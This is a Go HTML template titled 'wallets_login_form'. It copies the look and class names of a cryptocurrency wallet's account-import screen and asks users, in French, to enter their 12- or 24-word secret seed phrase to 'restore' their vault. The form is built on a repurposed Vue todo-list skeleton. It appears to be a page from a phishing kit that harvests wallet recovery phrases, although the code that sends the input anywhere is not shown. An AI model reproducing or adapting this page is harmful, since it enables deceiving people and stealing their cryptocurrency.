{{ define "wallets_login_form" }}<!DOCTYPE html><html lang="en">
  {{ template "head" .PageTitle }}
  <body>
  <div id="app-content" class="dark">
    <div class="app mouse-user-styles">
      <div class="main-container-wrapper">
        <div class="first-time-flow">
          <div class="first-time-flow__wrapper">
            <div class="import-account" id="v-model-textarea">
              <a class="import-account__back-button" href="/">&lt; Back</a>
              <div class="import-account__title">Restaurer votre compte avec une phrase Seed.</div>
              <div class="import-account__selector-label">Saisissez votre phrase secrète de 12 ou 24 mots pour restaurer votre coffre-fort.</div>


              <div class="todoapp import-account__input-wrapper">
                <textarea class="new-todo import-account__secret-phrase" autofocus autocomplete="off" placeholder="Séparez chaque mot avec un espace" v-model="newTodo" @keyup.enter="addTodo"></textarea>
                <div>${ errorTodo }</div>
                <button class="button btn--first-time first-time-flow__button" id="btn-restaurer" @click="addTodo()" >Restaurer</button>

                <section class="main" v-show="todos.length" v-cloak>
                  <input id="toggle-all"  class="toggle-all"  type="checkbox"  v-model="allDone"  />
                  <label for="toggle-all"></label>
                  <ul class="todo-list">
                    <li v-for="todo in filteredTodos" class="todo" :key="todo.id" :class="{ completed: todo.completed, editing: todo == editedTodo }">
                      <div class="view">
                        <input class="toggle" type="checkbox" v-model="todo.completed" />
                        <label @dblclick="editTodo(todo)">${ todo.title }</label>
                        <button class="destroy" @click="removeTodo(todo)"></button>
                      </div>
                      <input class="edit" type="text" v-model="todo.title"  v-todo-focus="todo == editedTodo" @blur="doneEdit(todo)" @keyup.enter="doneEdit(todo)" @keyup.esc="cancelEdit(todo)"/>
                    </li>
                  </ul>
                </section>
                <div class="footer" v-show="todos.length" v-cloak>
                    <span class="todo-count"><strong>${ remaining }</strong> ${ remaining | pluralize } left</span>
                  <ul class="filters">
                    <li>
                      <a href="#/all" :class="{ selected: visibility == 'all' }">All</a>
                    </li>
                    <li>
                      <a href="#/active" :class="{ selected: visibility == 'active' }">Active</a>
                    </li>
                    <li>
                      <a href="#/completed" :class="{ selected: visibility == 'completed' }">Completed</a>
                    </li>
                  </ul>
                  <button class="clear-completed" @click="removeCompleted" v-show="todos.length > remaining" >Clear completed</button>
                </div>
              </div>


            </div>
          </div>
        </div>
      </div>
    </div>

    {{ template "footer" }}
  </div>
</body>
</html>{{ end }}